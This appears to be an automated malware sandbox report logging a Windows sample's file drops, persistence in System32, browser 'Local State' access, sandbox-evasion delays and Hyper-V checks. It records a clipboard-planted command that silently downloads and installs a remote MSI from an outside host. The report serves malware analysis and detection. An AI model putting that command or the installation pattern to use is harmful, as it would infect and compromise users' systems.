Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\msiexec.exe File written: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\msiwrapper.ini
Source: C:\Windows\SysWOW64\expand.exe File opened: C:\Windows\LOGS\DPX\setuplog.cfg
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: `\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb&l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 4\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb,lg source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642B source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 2\??\C:\Users\user\AppData\Local\Temp\Win11Debloatrod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb3d8bbwe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: h\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local Statef source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb)l` source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 9C:\Users\user\AppData\Local\Temp\Win11Debloat\d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb=l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642t source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\cal State\EBWebView source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State^ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb0447 source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbeData source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb1.0-7e3544113374bc2769af5f67e125ab81de1b4b64c07fe68e2a7bc03646c85dfc source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb#lj source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21G source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: v\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642ate\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbRl} source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
Source: gr0D62WdkfOXqpbHbRHp.25.dr Static PE information: real checksum: 0x2571a6 should be: 0x2547a4
Source: 3b4007d200875d4c9c58c44073469727.tmp.23.dr Static PE information: section name: .fptable
Source: gr0D62WdkfOXqpbHbRHp.25.dr Static PE information: section name: .xdata

Persistence and Installation Behavior

Source: unknown Executable created and started: C:\Windows\system32\Hueta.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: msiexec /i https://kolepti.com/flare.msi /qn
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE1FD.tmp
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe File created: C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHp
Source: C:\Windows\SysWOW64\expand.exe File created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe (copy)
Source: C:\Windows\SysWOW64\expand.exe File created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\6ff0d56ce15b47fcb2f8c73e3a3af1d7$dpx$.tmp\3b4007d200875d4c9c58c44073469727.tmp
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe File created: C:\Windows\System32\Hueta.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GR0D62WDKFOXQPBHBRHP
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\Hueta.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5325 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4240 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIE1FD.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe TID: 5200 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 4872 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: chrome.exe, 00000000.00000002.1952278977.00000166840CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor3+f
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual ProcessorHINE
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partitiondll
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.00000166840B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partitionl
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes7
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisort
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=2
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000000.00000002.1952278977.00000166840CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processormuis
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorsyss
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: Hueta.exe, 0000001C.00000002.1636324703.0000020D26D34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V srqqnintjgmhtmg BusXS
Source: chrome.exe, 00000000.00000002.1952278977.00000166840F1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V srqqnintjgmhtmg Bus Pipes
